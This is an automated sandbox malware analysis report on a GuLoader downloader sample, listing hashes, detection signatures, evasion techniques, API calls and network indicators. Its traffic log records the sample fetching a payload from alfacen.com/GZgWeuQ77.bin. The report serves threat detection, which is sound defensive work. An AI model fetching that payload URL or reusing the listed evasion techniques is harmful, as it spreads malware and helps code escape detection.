Windows Analysis Report
450707124374000811.exe

Overview

General Information

Sample name: 450707124374000811.exe
Analysis ID: 1538185
MD5: 22aeab62009aaa9073b3159d7da1195e
SHA1: 602dd47b6910a522be90fc47d10d5c26a836a01a
SHA256: 1fc195e3937e7c7d9ca78f9c39f8997d5ed98fe1c608ad5c7b4a01dc24ddd967
Tags: exe, user-Racco42

Detection

GuLoader
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Opens the same file many times (likely Sandbox evasion)
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains executable resources (Code or Archives)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 450707124374000811.exe (PID: 5628 cmdline: "C:\Users\user\Desktop\450707124374000811.exe" MD5: 22AEAB62009AAA9073B3159D7DA1195E)
    • 450707124374000811.exe (PID: 5704 cmdline: "C:\Users\user\Desktop\450707124374000811.exe" MD5: 22AEAB62009AAA9073B3159D7DA1195E)
  • cleanup
Malware family (name / description / attribution / blogpost URLs / link):

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Yara match (source / rule / description / author / strings):

Source: 00000000.00000002.2851812607.0000000002C18000.00000040.00001000.00020000.00000000.sdmp
Rule: JoeSecurity_GuLoader_2
Description: Yara detected GuLoader
Author: Joe Security
Strings: (none listed)
    No Sigma rule has matched
    No Suricata rule has matched


    AV Detection

    Source: 450707124374000811.exeAvira: detected
    Source: 450707124374000811.exeReversingLabs: Detection: 44%
    Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
    Source: 450707124374000811.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 193.107.36.30:443 -> 192.168.2.5:49974 version: TLS 1.2
    Source: 450707124374000811.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: mshtml.pdb source: 450707124374000811.exe, 00000004.00000001.2850520898.0000000000649000.00000020.00000001.01000000.00000006.sdmp
    Source: Binary string: wntdll.pdbUGP source: 450707124374000811.exe, 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.3251140452.000000003576A000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.3249022839.00000000355BF000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: wntdll.pdb source: 450707124374000811.exe, 450707124374000811.exe, 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.3251140452.000000003576A000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.3249022839.00000000355BF000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mshtml.pdbUGP source: 450707124374000811.exe, 00000004.00000001.2850520898.0000000000649000.00000020.00000001.01000000.00000006.sdmp
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_004065C5 FindFirstFileW,FindClose,0_2_004065C5
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_00405990 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405990
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_00402862 FindFirstFileW,0_2_00402862
    Source: Joe Sandbox ViewIP Address: 193.107.36.30 193.107.36.30
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /GZgWeuQ77.bin HTTP/1.1User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: alfacen.comCache-Control: no-cache
    Source: global trafficDNS traffic detected: DNS query: alfacen.com
    Source: 450707124374000811.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: 450707124374000811.exe, 00000004.00000001.2850520898.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
    Source: 450707124374000811.exe, 00000004.00000001.2850520898.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
    Source: 450707124374000811.exe, 00000004.00000001.2850520898.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
    Source: 450707124374000811.exe, 00000004.00000002.3584534506.00000000056D7000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.3249602230.00000000056D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alfacen.com/
    Source: 450707124374000811.exe, 00000004.00000002.3584453826.0000000005698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alfacen.com/GZgWeuQ77.bin
    Source: 450707124374000811.exe, 00000004.00000002.3584534506.00000000056D7000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.3249602230.00000000056D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alfacen.com/GZgWeuQ77.binH
    Source: 450707124374000811.exe, 00000004.00000002.3584534506.00000000056D7000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.3249602230.00000000056D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alfacen.com/GZgWeuQ77.binR
    Source: 450707124374000811.exe, 00000004.00000002.3584453826.0000000005698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alfacen.com/GZgWeuQ77.bince
    Source: 450707124374000811.exe, 00000004.00000002.3584453826.0000000005698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alfacen.com/GZgWeuQ77.bine
    Source: 450707124374000811.exe, 00000004.00000002.3584453826.0000000005698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alfacen.com/GZgWeuQ77.bines
    Source: 450707124374000811.exe, 00000004.00000002.3584453826.0000000005698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alfacen.com/GZgWeuQ77.binnsz
    Source: 450707124374000811.exe, 00000004.00000001.2850520898.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
    Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
    Source: unknownHTTPS traffic detected: 193.107.36.30:443 -> 192.168.2.5:49974 version: TLS 1.2
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_00405425 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405425
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359835C0 NtCreateMutant,LdrInitializeThunk,4_2_359835C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_35982DF0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_35982C70
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35983090 NtSetValueKey,4_2_35983090
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35983010 NtOpenDirectoryObject,4_2_35983010
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35983D10 NtOpenProcessToken,4_2_35983D10
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35983D70 NtOpenThread,4_2_35983D70
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359839B0 NtGetContextThread,4_2_359839B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35984650 NtSuspendThread,4_2_35984650
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35984340 NtSetContextThread,4_2_35984340
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982DB0 NtEnumerateKey,4_2_35982DB0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982DD0 NtDelayExecution,4_2_35982DD0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982D10 NtMapViewOfSection,4_2_35982D10
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982D00 NtSetInformationFile,4_2_35982D00
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982D30 NtUnmapViewOfSection,4_2_35982D30
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982CA0 NtQueryInformationToken,4_2_35982CA0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982CC0 NtQueryVirtualMemory,4_2_35982CC0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982CF0 NtOpenProcess,4_2_35982CF0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982C00 NtQueryInformationProcess,4_2_35982C00
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982C60 NtCreateKey,4_2_35982C60
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982F90 NtProtectVirtualMemory,4_2_35982F90
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982FB0 NtResumeThread,4_2_35982FB0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982FA0 NtQuerySection,4_2_35982FA0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982FE0 NtCreateFile,4_2_35982FE0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982F30 NtCreateSection,4_2_35982F30
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982F60 NtCreateProcessEx,4_2_35982F60
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982E80 NtReadVirtualMemory,4_2_35982E80
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982EA0 NtAdjustPrivilegesToken,4_2_35982EA0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982EE0 NtQueueApcThread,4_2_35982EE0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982E30 NtWriteVirtualMemory,4_2_35982E30
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982B80 NtQueryInformationFile,4_2_35982B80
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982BA0 NtEnumerateValueKey,4_2_35982BA0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982BF0 NtAllocateVirtualMemory,4_2_35982BF0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982BE0 NtQueryValueKey,4_2_35982BE0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982B60 NtClose,4_2_35982B60
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982AB0 NtWaitForSingleObject,4_2_35982AB0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982AD0 NtReadFile,4_2_35982AD0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35982AF0 NtWriteFile,4_2_35982AF0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403373
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_00404C620_2_00404C62
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_00406ADD0_2_00406ADD
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_004072B40_2_004072B4
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359ED5B04_2_359ED5B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A195C34_2_35A195C3
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A075714_2_35A07571
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0F43F4_2_35A0F43F
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359414604_2_35941460
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0F7B04_2_35A0F7B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A016CC4_2_35A016CC
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359956304_2_35995630
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3595B1B04_2_3595B1B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A1B16B4_2_35A1B16B
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F1724_2_3593F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3598516C4_2_3598516C
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0F0E04_2_35A0F0E0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A070E94_2_35A070E9
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FF0CC4_2_359FF0CC
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359570C04_2_359570C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3599739A4_2_3599739A
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0132D4_2_35A0132D
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593D34C4_2_3593D34C
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359552A04_2_359552A0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596B2C04_2_3596B2C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F12ED4_2_359F12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596FDC04_2_3596FDC0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A07D734_2_35A07D73
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35953D404_2_35953D40
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A01D5A4_2_35A01D5A
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35911CAF4_2_35911CAF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0FCF24_2_35A0FCF2
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C9C324_2_359C9C32
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35951F924_2_35951F92
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0FFB14_2_35A0FFB1
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35913FD24_2_35913FD2
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35913FD54_2_35913FD5
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0FF094_2_35A0FF09
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35959EB04_2_35959EB0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E59104_2_359E5910
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359599504_2_35959950
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596B9504_2_3596B950
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359538E04_2_359538E0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359BD8004_2_359BD800
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596FB804_2_3596FB80
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3598DBF94_2_3598DBF9
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C5BF04_2_359C5BF0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0FB764_2_35A0FB76
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359EDAAC4_2_359EDAAC
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35995AA04_2_35995AA0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F1AA34_2_359F1AA3
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FDAC64_2_359FDAC6
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A07A464_2_35A07A46
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0FA494_2_35A0FA49
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C3A6C4_2_359C3A6C
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A105914_2_35A10591
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359505354_2_35950535
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FE4F64_2_359FE4F6
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F44204_2_359F4420
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A024464_2_35A02446
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594C7C04_2_3594C7C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359747504_2_35974750
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359507704_2_35950770
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596C6E04_2_3596C6E0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A041A24_2_35A041A2
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A101AA4_2_35A101AA
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A081CC4_2_35A081CC
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359EA1184_2_359EA118
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359401004_2_35940100
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D81584_2_359D8158
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E20004_2_359E2000
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A103E64_2_35A103E6
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3595E3F04_2_3595E3F0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0A3524_2_35A0A352
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D02C04_2_359D02C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F02744_2_359F0274
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35968DBF4_2_35968DBF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594ADE04_2_3594ADE0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359ECD1F4_2_359ECD1F
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3595AD004_2_3595AD00
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F0CB54_2_359F0CB5
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35940CF24_2_35940CF2
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35950C004_2_35950C00
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359CEFA04_2_359CEFA0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35942FC84_2_35942FC8
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3595CFE04_2_3595CFE0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35970F304_2_35970F30
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F2F304_2_359F2F30
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35992F284_2_35992F28
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C4F404_2_359C4F40
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35962E904_2_35962E90
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0CE934_2_35A0CE93
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0EEDB4_2_35A0EEDB
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0EE264_2_35A0EE26
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35950E594_2_35950E59
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A1A9A64_2_35A1A9A6
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359529A04_2_359529A0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359669624_2_35966962
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359368B84_2_359368B8
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3597E8F04_2_3597E8F0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359528404_2_35952840
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3595A8404_2_3595A840
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A06BD74_2_35A06BD7
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0AB404_2_35A0AB40
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594EA804_2_3594EA80
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: String function: 35997E54 appears 111 times
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: String function: 359CF290 appears 105 times
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: String function: 35985130 appears 58 times
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: String function: 359BEA12 appears 86 times
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: String function: 3593B970 appears 280 times
    Source: 450707124374000811.exeStatic PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
    Source: 450707124374000811.exe, 00000004.00000002.3610107598.0000000035BE1000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 450707124374000811.exe
    Source: 450707124374000811.exe, 00000004.00000003.3249022839.00000000356E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 450707124374000811.exe
    Source: 450707124374000811.exe, 00000004.00000003.3251140452.0000000035897000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 450707124374000811.exe
    Source: 450707124374000811.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: classification engineClassification label: mal80.troj.evad.winEXE@2/8@1/1
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403373
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_004046E6 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046E6
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_004020FE CoCreateInstance,0_2_004020FE
    Source: C:\Users\user\Desktop\450707124374000811.exe File created: C:\Users\user\AppData\Roaming\pechay
    Source: C:\Users\user\Desktop\450707124374000811.exe File created: C:\Users\user\AppData\Local\Temp\nso4568.tmp
    Source: 450707124374000811.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\450707124374000811.exe File read: C:\Users\desktop.ini
    Source: C:\Users\user\Desktop\450707124374000811.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: 450707124374000811.exeReversingLabs: Detection: 44%
    Source: C:\Users\user\Desktop\450707124374000811.exe File read: C:\Users\user\Desktop\450707124374000811.exe
    Source: unknownProcess created: C:\Users\user\Desktop\450707124374000811.exe "C:\Users\user\Desktop\450707124374000811.exe"
    Source: C:\Users\user\Desktop\450707124374000811.exeProcess created: C:\Users\user\Desktop\450707124374000811.exe "C:\Users\user\Desktop\450707124374000811.exe"
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: uxtheme.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: userenv.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: apphelp.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: propsys.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: dwmapi.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: cryptbase.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: oleacc.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: version.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: shfolder.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: kernel.appcore.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: windows.storage.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: wldp.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: riched20.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: usp10.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: msls31.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: textinputframework.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: coreuicomponents.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: coremessaging.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: ntmarta.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: wintypes.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: wintypes.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: wintypes.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: profapi.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: iertutil.dll
